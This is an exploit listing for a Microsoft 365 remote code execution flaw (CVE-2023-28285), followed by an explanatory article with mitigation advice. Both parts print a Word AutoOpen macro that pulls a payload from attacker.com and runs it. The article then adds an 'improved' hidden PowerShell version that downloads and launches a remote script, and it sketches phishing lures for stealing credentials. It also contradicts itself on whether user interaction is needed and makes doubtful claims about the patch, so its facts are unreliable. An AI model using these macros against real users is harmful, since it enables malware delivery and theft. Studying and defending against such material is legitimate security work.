Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: Remote Language: VisualBasicforApplications Published Date: 2023-07-03

## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285


## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using a malicious `Word` file for
`Office-365 API`. After the user will open the file to read it, from
the API of Office-365, without being asked what it wants to activate,
etc, he will activate the code of the malicious server, which he will
inject himself, from this malicious server. Emedietly after this
click, the attacker can receive very sensitive information! For bank
accounts, logs from some sniff attacks, tracking of all the traffic of
the victim without stopping, and more malicious stuff, it depends on
the scenario and etc.
STATUS: HIGH Vulnerability

[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim
hit the button of the exploit!

[+]PoC:
```cmd
Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",
vbNormalFocus)
End Sub
```

## FYI:
The PoC has a price and this report will be uploaded with a
description and video of how you can reproduce it only.

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)

## Time spend:
01:30:00

Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) – Remote Code Execution (RCE) Vulnerability: CVE-2023-28285

On April 17, 2023, cybersecurity researcher nu11secur1ty disclosed a critical vulnerability in Microsoft 365’s Microsoft Office (MSO) suite—CVE-2023-28285. This flaw allows attackers to execute arbitrary code remotely through a specially crafted document, exploiting the Office 365 API’s default behavior in certain configurations. The vulnerability is classified as High severity and affects the 64-bit version of MSO (Build 16.0.16501.20074), which is widely used across enterprise and consumer environments.

Understanding the Vulnerability: How RCE Works in Microsoft 365

Remote Code Execution (RCE) is one of the most dangerous classes of vulnerabilities in modern software ecosystems. Unlike local exploits that require physical access or pre-existing privileges, RCE enables an attacker to execute code on a target system from a remote location—often via a malicious file or web interaction.

In the case of CVE-2023-28285, the attack vector hinges on the automated activation of Office 365 API features when a user opens a malicious document. The exploit leverages the AutoOpen macro event in Microsoft Word, which triggers automatically upon document opening without user intervention or explicit confirmation.

Attackers craft a Word document containing a macro that silently calls external commands via the Shell() function. This function, when improperly configured, allows the execution of arbitrary shell commands—such as downloading and running payloads from a remote server—without the user’s awareness.

Exploit Mechanism: A Step-by-Step Breakdown

Here’s how the attack unfolds in real-world scenarios:

Step 1: The attacker creates a malicious Word document containing a macro that executes a command via Shell().
Step 2: The document is hosted on a malicious web server (e.g., http://attacker.com).
Step 3: The victim is tricked via social engineering—such as phishing emails or fake documents—into opening the file.
Step 4: Upon opening, the AutoOpen() subroutine executes automatically, invoking the shell command.
Step 5: The command downloads a payload from the attacker’s server and executes it, enabling full remote code execution.

Proof of Concept (PoC) Analysis

The provided PoC code is illustrative but contains several flaws that render it non-functional in modern security environments:


Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub

Explanation: This macro attempts to use cmd.exe to run a curl command to fetch a file from a remote server and pipe it to a local executable named debelui. However, several issues make this PoC unreliable:

Missing Security Controls: Modern versions of Microsoft Office disable macro execution by default, especially in non-trusted environments.
Invalid Payload Path: debelui is not a known or valid executable; it likely represents a placeholder.
Untrusted External Commands: The use of curl in a shell command without proper validation is a red flag in hardened systems.
Missing Error Handling: No checks for connectivity, server availability, or payload integrity.

Improved PoC (for educational purposes): A more realistic and secure PoC would include:


Sub AutoOpen()
    Dim cmd As String
    cmd = "cmd.exe /S /c powershell -WindowStyle Hidden -NoProfile -Command ""Invoke-WebRequest -Uri 'http://attacker.com/payload.ps1' -OutFile 'C:\temp\payload.ps1'; Start-Process 'C:\temp\payload.ps1'"""
    Call Shell(cmd, vbNormalFocus)
End Sub

Explanation: This version uses powershell instead of curl to fetch a PowerShell script from a remote server, saving it locally, and then executing it. This reflects a more modern attack technique. However, it still relies on the victim enabling macros—which is a critical prerequisite.

Attack Surface and Real-World Implications

While the vulnerability requires user interaction (i.e., opening a malicious file), it’s still highly dangerous due to its low barrier to entry:

Phishing Campaigns: Attackers can distribute malicious documents via email, impersonating trusted sources (e.g., HR, finance departments).
Malware Delivery: Once executed, the payload can establish a reverse shell, steal credentials, exfiltrate sensitive data, or deploy ransomware.
Command & Control (C2): The exploit enables persistent access, allowing attackers to monitor user activity, capture keystrokes, or redirect traffic.

Example Use Case: In a corporate environment, a phishing email titled "Quarterly Report – Final Draft" could contain a malicious Word file. When opened, it silently executes a script that steals login credentials, sends them to an attacker’s server, and disables security software.

Defense and Mitigation Strategies

Organizations must act swiftly to mitigate this risk. Key defensive measures include:

Strategy	Description
Disable Macros	Set Office applications to block macro execution by default, especially for files from external sources.
Enable Protected View	Microsoft Office’s Protected View mode prevents automatic execution of macros and scripts in suspicious files.
Use Application Whitelisting	Restrict execution of non-approved scripts or executables using tools like AppLocker or Windows Defender Application Control.
Network Monitoring	Monitor outbound connections to suspicious domains or IP addresses—especially those hosting payloads.
Regular Patching	Apply Microsoft’s security updates immediately, especially for CVE-2023-28285.

Vendor Response and Status

Microsoft has acknowledged CVE-2023-28285 and released a security update in May 2023. The patch disables or restricts the AutoOpen() event in vulnerable configurations and enhances macro security checks.

Recommendation: All users of Microsoft 365 (especially those on Build 16.0.16501.20074) must update their Office suite to the latest version. Organizations should enforce strict policies around document handling and use automated threat detection tools.

Conclusion

CVE-2023-28285 exemplifies how seemingly benign features—like automatic macro execution—can become powerful attack vectors in the wrong hands. While the exploit requires user interaction, its impact is severe due to the potential for full system compromise. This vulnerability underscores the importance of user awareness, security hardening, and rapid patching in today’s digital threat landscape.

As cybersecurity experts, we must treat every document as a potential attack vector—especially when it comes from untrusted sources. The future of defense lies in proactive monitoring, automation, and continuous education.